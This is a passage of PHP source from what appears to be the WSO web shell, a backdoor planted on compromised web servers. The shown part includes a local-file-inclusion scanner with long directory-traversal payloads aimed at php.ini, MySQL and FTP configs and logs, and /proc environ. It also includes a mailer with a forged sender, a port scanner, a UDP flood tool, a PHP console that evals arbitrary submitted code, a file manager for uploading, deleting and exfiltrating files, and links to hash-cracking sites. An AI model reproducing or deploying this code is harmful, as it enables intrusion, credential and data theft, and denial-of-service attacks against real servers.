59019 =>"../../../../../../../../../../../../../../../etc/php/apache/php.ini".$byte1."",
59120 =>"../../../../../../../../../../../../../../../etc/php/apache2/php.ini".$byte1."",
59221 =>"../../../../../../../../../../../../../../../web/conf/php.ini".$byte1."",
59322 =>"../../../../../../../../../../../../../../../usr/local/Zend/etc/php.ini".$byte1."",
59423 =>"../../../../../../../../../../../../../../../opt/xampp/etc/php.ini".$byte1."",
59524 =>"../../../../../../../../../../../../../../../var/local/www/conf/php.ini".$byte1."",
59625 =>"../../../../../../../../../../../../../../../etc/php/cgi/php.ini".$byte1."",
59726 =>"../../../../../../../../../../../../../../../etc/php4/cgi/php.ini".$byte1."",
59827 =>"../../../../../../../../../../../../../../../etc/php5/cgi/php.ini".$byte1."");
599$lfimysql = array(
6001 =>"../../../../../../../../../../../../../../../var/log/mysql/mysql-bin.log".$byte1."",
6012 =>"../../../../../../../../../../../../../../../var/log/mysql.log".$byte1."",
6023 =>"../../../../../../../../../../../../../../../var/log/mysqlderror.log".$byte1."",
6034 =>"../../../../../../../../../../../../../../../var/log/mysql/mysql.log".$byte1."",
6045 =>"../../../../../../../../../../../../../../../var/log/mysql/mysql-slow.log".$byte1."",
6056 =>"../../../../../../../../../../../../../../../var/mysql.log".$byte1."",
6067 =>"../../../../../../../../../../../../../../../var/lib/mysql/my.cnf".$byte1."",
6078 =>"../../../../../../../../../../../../../../../etc/mysql/my.cnf".$byte1."",
6089 =>"../../../../../../../../../../../../../../../var/log/mysqld.log".$byte1."",
60910 =>"../../../../../../../../../../../../../../../etc/my.cnf".$byte1."");
610$lfiftp = array(
6111 =>"../../../../../../../../../../../../../../../etc/logrotate.d/proftpd".$byte1."",
6122 =>"../../../../../../../../../../../../../../../www/logs/proftpd.system.log".$byte1."",
6133 =>"../../../../../../../../../../../../../../../var/log/proftpd".$byte1."",
6144 =>"../../../../../../../../../../../../../../../etc/proftp.conf".$byte1."",
6155 =>"../../../../../../../../../../../../../../../etc/protpd/proftpd.conf".$byte1."",
6166 =>"../../../../../../../../../../../../../../../etc/vhcs2/proftpd/proftpd.conf".$byte1."",
6177 =>"../../../../../../../../../../../../../../../etc/proftpd/modules.conf".$byte1."",
6188 =>"../../../../../../../../../../../../../../../var/log/vsftpd.log".$byte1."",
6199 =>"../../../../../../../../../../../../../../../etc/vsftpd.chroot_list".$byte1."",
62010 =>"../../../../../../../../../../../../../../../etc/logrotate.d/vsftpd.log".$byte1."",
62111 =>"../../../../../../../../../../../../../../../etc/vsftpd/vsftpd.conf".$byte1."",
62212 =>"../../../../../../../../../../../../../../../etc/vsftpd.conf".$byte1."",
62313 =>"../../../../../../../../../../../../../../../etc/chrootUsers".$byte1."",
62414 =>"../../../../../../../../../../../../../../../var/log/xferlog".$byte1."",
62515 =>"../../../../../../../../../../../../../../../var/adm/log/xferlog".$byte1."",
62616 =>"../../../../../../../../../../../../../../../etc/wu-ftpd/ftpaccess".$byte1."",
62717 =>"../../../../../../../../../../../../../../../etc/wu-ftpd/ftphosts".$byte1."",
62818 =>"../../../../../../../../../../../../../../../etc/wu-ftpd/ftpusers".$byte1."",
62919 =>"../../../../../../../../../../../../../../../usr/sbin/pure-config.pl".$byte1."",
63020 =>"../../../../../../../../../../../../../../../usr/etc/pure-ftpd.conf".$byte1."",
63121 =>"../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.conf".$byte1."",
63222 =>"../../../../../../../../../../../../../../../usr/local/etc/pure-ftpd.conf".$byte1."",
63323 =>"../../../../../../../../../../../../../../../usr/local/etc/pureftpd.pdb".$byte1."",
63424 =>"../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb".$byte1."",
63525 =>"../../../../../../../../../../../../../../../usr/local/pureftpd/sbin/pure-config.pl".$byte1."",
63626 =>"../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf".$byte1."",
63727 =>"../../../../../../../../../../../../../../../etc/pure-ftpd.conf".$byte1."",
63828 =>"../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb".$byte1."",
63929 =>"../../../../../../../../../../../../../../../etc/pureftpd.pdb".$byte1."",
64030 =>"../../../../../../../../../../../../../../../etc/pureftpd.passwd".$byte1."",
64131 =>"../../../../../../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb".$byte1."",
64232 =>"../../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/".$byte1."",
64333 =>"../../../../../../../../../../../../../../../usr/ports/net/pure-ftpd/".$byte1."",
64434 =>"../../../../../../../../../../../../../../../usr/pkgsrc/net/pureftpd/".$byte1."",
64535 =>"../../../../../../../../../../../../../../../usr/ports/contrib/pure-ftpd/".$byte1."",
64636 =>"../../../../../../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log".$byte1."",
64737 =>"../../../../../../../../../../../../../../../logs/pure-ftpd.log".$byte1."",
64838 =>"../../../../../../../../../../../../../../../var/log/pureftpd.log".$byte1."",
64939 =>"../../../../../../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log".$byte1."",
65040 =>"../../../../../../../../../../../../../../../var/log/ftp-proxy".$byte1."",
65141 =>"../../../../../../../../../../../../../../../var/log/ftplog".$byte1."",
65242 =>"../../../../../../../../../../../../../../../etc/logrotate.d/ftp".$byte1."",
65343 =>"../../../../../../../../../../../../../../../etc/ftpchroot".$byte1."",
65444 =>"../../../../../../../../../../../../../../../etc/ftphosts".$byte1."");
655$x = 1;
656if ( $type == 1 ) {
657$res1 = FetchURL($target.$lfitest);
658$res2 = FetchURL($target.$lfitest2);
659$rhash1 = md5($res1);
660$rhash2 = md5($res2);
661if ($rhash1 != $rhash2) {
662print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
663while($lfiaccess[$x]) {
664$res3 = FetchURL($target.$lfiaccess[$x]);
665$rhash3 = md5($res3);
666if ($rhash3 != $rhash2) {
667print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiaccess[$x]."\">".$target."".$lfiaccess[$x]."</a><br />";
668}
669else {
670print "<font color='red'>[!] Failed!</font>".$target."".$lfiaccess[$x]."<br />";
671}
672$x++;
673}
674}
675}
676if ( $type == 2 ) {
677$res1 = FetchURL($target.$lfitest);
678$res2 = FetchURL($target.$lfitest2);
679$rhash1 = md5($res1);
680$rhash2 = md5($res2);
681if ($rhash1 != $rhash2) {
682print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
683while($lficonfig[$x]) {
684$res3 = FetchURL($target.$lficonfig[$x]);
685$rhash3 = md5($res3);
686if ($rhash3 != $rhash2) {
687print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lficonfig[$x]."\">".$target."".$lficonfig[$x]."</a><br />";
688}
689else {
690print "<font color='red'>[!] Failed!</font>".$target."".$lficonfig[$x]."<br />";
691}
692$x++;
693}
694}
695}
696if ( $type == 3 ) {
697$res1 = FetchURL($target.$lfitest);
698$res2 = FetchURL($target.$lfitest2);
699$rhash1 = md5($res1);
700$rhash2 = md5($res2);
701if ($rhash1 != $rhash2) {
702print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
703while($lfierror[$x]) {
704$res3 = FetchURL($target.$lfierror[$x]);
705$rhash3 = md5($res3);
706if ($rhash3 != $rhash2) {
707print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfierror[$x]."\">".$target."".$lfierror[$x]."</a><br />";
708}
709else {
710print "<font color='red'>[!] Failed!</font>".$target."".$lfierror[$x]."<br />";
711}
712$x++;
713}
714}
715}
716if ( $type == 4 ) {
717$res1 = FetchURL($target.$lfitest);
718$res2 = FetchURL($target.$lfitest2);
719$rhash1 = md5($res1);
720$rhash2 = md5($res2);
721if ($rhash1 != $rhash2) {
722print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
723while($lfiphpini[$x]) {
724$res3 = FetchURL($target.$lfiphpini[$x]);
725$rhash3 = md5($res3);
726if ($rhash3 != $rhash2) {
727print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiphpini[$x]."\">".$target."".$lfiphpini[$x]."</a><br />";
728}
729else {
730print "<font color='red'>[!] Failed!</font>".$target."".$lfiphpini[$x]."<br />";
731}
732$x++;
733}
734}
735}
736if ( $type == 5 ) {
737$res1 = FetchURL($target.$lfitest);
738$res2 = FetchURL($target.$lfitest2);
739$rhash1 = md5($res1);
740$rhash2 = md5($res2);
741if ($rhash1 != $rhash2) {
742print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
743while($lfimysql[$x]) {
744$res3 = FetchURL($target.$lfimysql[$x]);
745$rhash3 = md5($res3);
746if ($rhash3 != $rhash2) {
747print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfimysql[$x]."\">".$target."".$lfimysql[$x]."</a><br />";
748}
749else {
750print "<font color='red'>[!] Failed!</font>".$target."".$lfimysql[$x]."<br />";
751}
752$x++;
753}
754}
755}
756if ( $type == 6 ) {
757$res1 = FetchURL($target.$lfitest);
758$res2 = FetchURL($target.$lfitest2);
759$rhash1 = md5($res1);
760$rhash2 = md5($res2);
761if ($rhash1 != $rhash2) {
762print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
763while($lfiftp[$x]) {
764$res3 = FetchURL($target.$lfiftp[$x]);
765$rhash3 = md5($res3);
766if ($rhash3 != $rhash2) {
767print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiftp[$x]."\">".$target."".$lfiftp[$x]."</a><br />";
768}
769else {
770print "<font color='red'>[!] Failed!</font>".$target."".$lfiftp[$x]."<br />";
771}
772$x++;
773}
774}
775}
776if ( $type == 7 ) {
777$res1 = FetchURL($target.$lfitest);
778$res2 = FetchURL($target.$lfitest2);
779$rhash1 = md5($res1);
780$rhash2 = md5($res2);
781if ($rhash1 != $rhash2) {
782print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";{
783$res3 = FetchURL($target.$lfiprocenv);
784$rhash3 = md5($res3);
785if ($rhash3 != $rhash2) {
786print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiprocenv."\">".$target."".$lfiprocenv."</a><br />";
787}
788else {
789print "<font color='red'>[!] Failed!</font>".$target."".$lfiprocenv."<br />";
790}
791}
792}
793}
794}
795wsoFooter();
796}
797function actionphptools() {
798wsoHeader();
799;echo '<center>';
800echo '<b>Mailer</b><br>
801<form action="'.$surl.'" method=POST>
802<input type="hidden" name="a" value="phptools">
803<input type=text name=to value=to><br>
804<input type=text name=from value=from><br>
805<input type=text name=subject value=subject><br>
806<input type=text name=body value=body><br>
807<input type=submit name=submit value=Submit></form>';
808if (isset($_POST['to']) &&isset($_POST['from']) &&isset($_POST['subject']) &&isset($_POST['body'])) {
809$headers = 'From: '.$_POST['from'];
810mail ($_POST['to'],$_POST['subject'],$_POST['body'],$headers);
811echo 'Email sent.';
812}
813echo '<br><b>Port Scanner</b><br>';
814$start = strip_tags($_POST['start']);
815$end = strip_tags($_POST['end']);
816$host = strip_tags($_POST['host']);
817if(isset($_POST['host']) &&is_numeric($_POST['end']) &&is_numeric($_POST['start'])){
818for($i = $start;$i<=$end;$i++){
819$fp = @fsockopen($host,$i,$errno,$errstr,3);
820if($fp){
821echo 'Port '.$i.' is <font color=green>open</font><br>';
822}
823flush();
824}
825}else{
826;echo '<form action="?" method="POST">
827<input type="hidden" name="a" value="phptools">
828Host:<br />
829<input type="text" name="host" value="localhost"/><br />
830Port start:<br />
831<input type="text" name="start" value="0"/><br />
832Port end:<br />
833<input type="text" name="end" value="5000"/><br />
834<input type="submit" value="Scan Ports" />
835</form>
836';
837}
838if(isset($_POST['host'])&&is_numeric($_POST['time'])){
839$pakits = 0;
840ignore_user_abort(TRUE);
841set_time_limit(0);
842$exec_time = $_POST['time'];
843$time = time();
844$max_time = $time+$exec_time;
845$host = $_POST['host'];
846for($i=0;$i<65000;$i++){
847$out .= 'X';
848}
849while(1){
850$pakits++;
851if(time() >$max_time){
852break;
853}
854$rand = rand(1,65000);
855$fp = fsockopen('udp://'.$host,$rand,$errno,$errstr,5);
856if($fp){
857fwrite($fp,$out);
858fclose($fp);
859}
860}
861echo "<br><b>UDP Flood</b><br>Completed with $pakits (".round(($pakits*65)/1024,2) ." MB) packets averaging ".round($pakits/$exec_time,2) ." packets per second \n";
862echo '<br><br>
863 <form action="'.$surl.'" method=POST>
864 <input type="hidden" name="a" value="phptools">
865 Host: <input type=text name=host value=localhost>
866 Length (seconds): <input type=text name=time value=9999>
867 <input type=submit value=Go></form>';
868}else{echo '<br><b>UDP Flood</b><br>
869 <form action=? method=POST>
870 <input type="hidden" name="a" value="phptools">
871 Host: <br><input type=text name=host value=localhost><br>
872 Length (seconds): <br><input type=text name=time value=9999><br>
873 <input type=submit value=Go></form>';
874}
875;echo '</center>';
876wsoFooter();}
877function actionPhp() {
878if(isset($_POST['ajax'])) {
879$_SESSION[md5($_SERVER['HTTP_HOST']) .'ajax'] = true;
880ob_start();
881eval($_POST['p1']);
882$temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0") ."';\n";
883echo strlen($temp),"\n",$temp;
884exit;
885}
886wsoHeader();
887if(isset($_POST['p2']) &&($_POST['p2'] == 'info')) {
888echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
889ob_start();
890phpinfo();
891$tmp = ob_get_clean();
892$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
893$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
894echo str_replace('<h1','<h2',$tmp) .'</div><br>';
895}
896if(empty($_POST['ajax']) &&!empty($_POST['p1']))
897$_SESSION[md5($_SERVER['HTTP_HOST']) .'ajax'] = false;
898echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
899echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
900if(!empty($_POST['p1'])) {
901ob_start();
902eval($_POST['p1']);
903echo htmlspecialchars(ob_get_clean());
904}
905echo '</pre></div>';
906wsoFooter();
907}
908function actionFilesMan() {
909wsoHeader();
910echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
911if(!empty($_POST['p1'])) {
912switch($_POST['p1']) {
913case 'uploadFile':
914if(!@move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']))
915echo "Can't upload file!";
916break;
917case 'mkdir':
918if(!@mkdir($_POST['p2']))
919echo "Can't create new dir";
920break;
921case 'delete':
922function deleteDir($path) {
923$path = (substr($path,-1)=='/') ?$path:$path.'/';
924$dh = opendir($path);
925while ( ($item = readdir($dh) ) !== false) {
926$item = $path.$item;
927if ( (basename($item) == "..") ||(basename($item) == ".") )
928continue;
929$type = filetype($item);
930if ($type == "dir")
931deleteDir($item);
932else
933@unlink($item);
934}
935closedir($dh);
936@rmdir($path);
937}
938if(is_array(@$_POST['f']))
939foreach($_POST['f'] as $f) {
940if($f == '..')
941continue;
942$f = urldecode($f);
943if(is_dir($f))
944deleteDir($f);
945else
946@unlink($f);
947}
948break;
949case 'paste':
950if($_SESSION['act'] == 'copy') {
951function copy_paste($c,$s,$d){
952if(is_dir($c.$s)){
953mkdir($d.$s);
954$h = @opendir($c.$s);
955while (($f = @readdir($h)) !== false)
956if (($f != ".") and ($f != ".."))
957copy_paste($c.$s.'/',$f,$d.$s.'/');
958}elseif(is_file($c.$s))
959@copy($c.$s,$d.$s);
960}
961foreach($_SESSION['f'] as $f)
962copy_paste($_SESSION['c'],$f,$GLOBALS['cwd']);
963}elseif($_SESSION['act'] == 'move') {
964function move_paste($c,$s,$d){
965if(is_dir($c.$s)){
966mkdir($d.$s);
967$h = @opendir($c.$s);
968while (($f = @readdir($h)) !== false)
969if (($f != ".") and ($f != ".."))
970copy_paste($c.$s.'/',$f,$d.$s.'/');
971}elseif(@is_file($c.$s))
972@copy($c.$s,$d.$s);
973}
974foreach($_SESSION['f'] as $f)
975@rename($_SESSION['c'].$f,$GLOBALS['cwd'].$f);
976}elseif($_SESSION['act'] == 'zip') {
977if(class_exists('ZipArchive')) {
978$zip = new ZipArchive();
979if ($zip->open($_POST['p2'],1)) {
980chdir($_SESSION['c']);
981foreach($_SESSION['f'] as $f) {
982if($f == '..')
983continue;
984if(@is_file($_SESSION['c'].$f))
985$zip->addFile($_SESSION['c'].$f,$f);
986elseif(@is_dir($_SESSION['c'].$f)) {
987$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
988foreach ($iterator as $key=>$value) {
989$zip->addFile(realpath($key),$key);
990}
991}
992}
993chdir($GLOBALS['cwd']);
994$zip->close();
995}
996}
997}elseif($_SESSION['act'] == 'unzip') {
998if(class_exists('ZipArchive')) {
999$zip = new ZipArchive();
1000foreach($_SESSION['f'] as $f) {
1001if($zip->open($_SESSION['c'].$f)) {
1002$zip->extractTo($GLOBALS['cwd']);
1003$zip->close();
1004}
1005}
1006}
1007}elseif($_SESSION['act'] == 'tar') {
1008chdir($_SESSION['c']);
1009$_SESSION['f'] = array_map('escapeshellarg',$_SESSION['f']);
1010wsoEx('tar cfzv '.escapeshellarg($_POST['p2']) .' '.implode(' ',$_SESSION['f']));
1011chdir($GLOBALS['cwd']);
1012}
1013unset($_SESSION['f']);
1014break;
1015default:
1016if(!empty($_POST['p1'])) {
1017$_SESSION['act'] = @$_POST['p1'];
1018$_SESSION['f'] = @$_POST['f'];
1019foreach($_SESSION['f'] as $k =>$f)
1020$_SESSION['f'][$k] = urldecode($f);
1021$_SESSION['c'] = @$_POST['c'];
1022}
1023break;
1024}
1025}
1026$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
1027if($dirContent === false) {echo 'Can\'t open this folder!';wsoFooter();return;}
1028global $sort;
1029$sort = array('name',1);
1030if(!empty($_POST['p1'])) {
1031if(preg_match('!s_([A-z]+)_(\d{1})!',$_POST['p1'],$match))
1032$sort = array($match[1],(int)$match[2]);
1033}
1034echo "<script>
1035 function sa() {
1036 for(i=0;i<d.files.elements.length;i++)
1037 if(d.files.elements[i].type == 'checkbox')
1038 d.files.elements[i].checked = d.files.elements[0].checked;
1039 }
1040
1041</script>
1042<table width='100%' class='main' cellspacing='0' cellpadding='2'>
1043<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
1044$dirs = $files = array();
1045$n = count($dirContent);
1046for($i=0;$i<$n;$i++) {
1047$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
1048$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
1049$tmp = array('name'=>$dirContent[$i],
1050'path'=>$GLOBALS['cwd'].$dirContent[$i],
1051'modify'=>date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'] .$dirContent[$i])),
1052'perms'=>wsoPermsColor($GLOBALS['cwd'] .$dirContent[$i]),
1053'size'=>@filesize($GLOBALS['cwd'].$dirContent[$i]),
1054'owner'=>$ow['name']?$ow['name']:@fileowner($dirContent[$i]),
1055'group'=>$gr['name']?$gr['name']:@filegroup($dirContent[$i])
1056);
1057if(@is_file($GLOBALS['cwd'] .$dirContent[$i]))
1058$files[] = array_merge($tmp,array('type'=>'file'));
1059elseif(@is_link($GLOBALS['cwd'] .$dirContent[$i]))
1060$dirs[] = array_merge($tmp,array('type'=>'link','link'=>readlink($tmp['path'])));
1061elseif(@is_dir($GLOBALS['cwd'] .$dirContent[$i])&&($dirContent[$i] != "."))
1062$dirs[] = array_merge($tmp,array('type'=>'dir'));
1063}
1064$GLOBALS['sort'] = $sort;
1065function wsoCmp($a,$b) {
1066if($GLOBALS['sort'][0] != 'size')
1067return strcmp(strtolower($a[$GLOBALS['sort'][0]]),strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
1068else
1069return (($a['size'] <$b['size']) ?-1 : 1)*($GLOBALS['sort'][1]?1:-1);
1070}
1071usort($files,"wsoCmp");
1072usort($dirs,"wsoCmp");
1073$files = array_merge($dirs,$files);
1074$l = 0;
1075foreach($files as $f) {
1076echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title='.$f['link'] .'><b>[ '.htmlspecialchars($f['name']) .' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
1077.'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
1078$l = $l?0:1;
1079}
1080echo "<tr><td colspan=7>
1081
1082 <input type=hidden name=a value='FilesMan'>
1083 <input type=hidden name=c value='".htmlspecialchars($GLOBALS['cwd']) ."'>
1084 <input type=hidden name=charset value='".(isset($_POST['charset'])?$_POST['charset']:'')."'>
1085 <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
1086if(class_exists('ZipArchive'))
1087echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
1088echo "<option value='tar'>Compress (tar.gz)</option>";
1089if(!empty($_SESSION['act']) &&@count($_SESSION['f']))
1090echo "<option value='paste'>Paste / Compress</option>";
1091echo "</select> ";
1092if(!empty($_SESSION['act']) &&@count($_SESSION['f']) &&(($_SESSION['act'] == 'zip') ||($_SESSION['act'] == 'tar')))
1093echo "file name: <input type=text name=p2 value='wso_".date("Ymd_His") .".".($_SESSION['act'] == 'zip'?'zip':'tar.gz') ."'> ";
1094echo "<input type='submit' value='>>'></td></tr></form></table></div>";
1095wsoFooter();
1096}
1097function actionStringTools() {
1098if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
1099if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
1100if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
1101if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
1102if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
1103$stringTools = array(
1104'Base64 encode'=>'base64_encode',
1105'Base64 decode'=>'base64_decode',
1106'Url encode'=>'urlencode',
1107'Url decode'=>'urldecode',
1108'Full urlencode'=>'full_urlencode',
1109'md5 hash'=>'md5',
1110'sha1 hash'=>'sha1',
1111'crypt'=>'crypt',
1112'CRC32'=>'crc32',
1113'ASCII to HEX'=>'ascii2hex',
1114'HEX to ASCII'=>'hex2ascii',
1115'HEX to DEC'=>'hexdec',
1116'HEX to BIN'=>'hex2bin',
1117'DEC to HEX'=>'dechex',
1118'DEC to BIN'=>'decbin',
1119'BIN to HEX'=>'binhex',
1120'BIN to DEC'=>'bindec',
1121'String to lower case'=>'strtolower',
1122'String to upper case'=>'strtoupper',
1123'Htmlspecialchars'=>'htmlspecialchars',
1124'String length'=>'strlen',
1125);
1126if(isset($_POST['ajax'])) {
1127$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
1128ob_start();
1129if(in_array($_POST['p1'],$stringTools))
1130echo $_POST['p1']($_POST['p2']);
1131$temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
1132echo strlen($temp),"\n",$temp;
1133exit;
1134}
1135wsoHeader();
1136echo '<h1>String conversions</h1><div class=content>';
1137if(empty($_POST['ajax'])&&!empty($_POST['p1']))
1138$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
1139echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
1140foreach($stringTools as $k =>$v)
1141echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
1142echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
1143if(!empty($_POST['p1'])) {
1144if(in_array($_POST['p1'],$stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
1145}
1146echo"</pre></div><br><h1>Search text in files:</h1><div class=content>
1147
1148 <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
1149 <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
1150 <tr><td>Path:</td><td><input type='text' name='cwd' value='".htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
1151 <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
1152 <tr><td></td><td><input type='submit' value='>>'></td></tr>
1153 </table></form>";
1154function wsoRecursiveGlob($path) {
1155if(substr($path,-1) != '/')
1156$path.='/';
1157$paths = @array_unique(@array_merge(@glob($path.$_POST['p3']),@glob($path.'*',GLOB_ONLYDIR)));
1158if(is_array($paths)&&@count($paths)) {
1159foreach($paths as $item) {
1160if(@is_dir($item)){
1161if($path!=$item)
1162wsoRecursiveGlob($item);
1163}else {
1164if(@strpos(@file_get_contents($item),@$_POST['p2'])!==false)
1165echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\")'>".htmlspecialchars($item)."</a><br>";
1166}
1167}
1168}
1169}
1170if(@$_POST['p3'])
1171wsoRecursiveGlob($_POST['c']);
1172echo "</div><br><h1>Search for hash:</h1><div class=content>
1173
1174 <form method='post' target='_blank' name='hf'>
1175 <input type='text' name='hash' style='width:200px;'><br>
1176 <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
1177 <input type='button' value='milw0rm.com' onclick=\"document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()\"><br>
1178 <input type='button' value='hashcracking.info' onclick=\"document.hf.action='https://hashcracking.info/index.php';document.hf.submit()\"><br>
1179 <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
1180 <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
1181 </form></div>";
1182wsoFooter();
1183}
1184function actionFilesTools() {
1185if( isset($_POST['p1']) )
1186$_POST['p1'] = urldecode($_POST['p1']);
1187if(@$_POST['p2']=='download') {
1188if(@is_file($_POST['p1']) &&@is_readable($_POST['p1'])) {
1189ob_start("ob_gzhandler",4096);
1190header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
1191if (function_exists("mime_content_type")) {
1192$type = @mime_content_type($_POST['p1']);
1193header("Content-Type: ".$type);
1194}else
1195header("Content-Type: application/octet-stream");
1196$fp = @fopen($_POST['p1'],"r");
1197if($fp) {
1198while(!@feof($fp))
1199echo @fread($fp,1024);
1200fclose($fp);
1201}
1202}exit;
1203}
1204if( @$_POST['p2'] == 'mkfile') {
1205if(!file_exists($_POST['p1'])) {
1206$fp = @fopen($_POST['p1'],'w');
1207if($fp) {
1208$_POST['p2'] = "edit";
1209fclose($fp);
1210}
1211}
1212}
1213wsoHeader();
1214echo '<h1>File tools</h1><div class=content>';
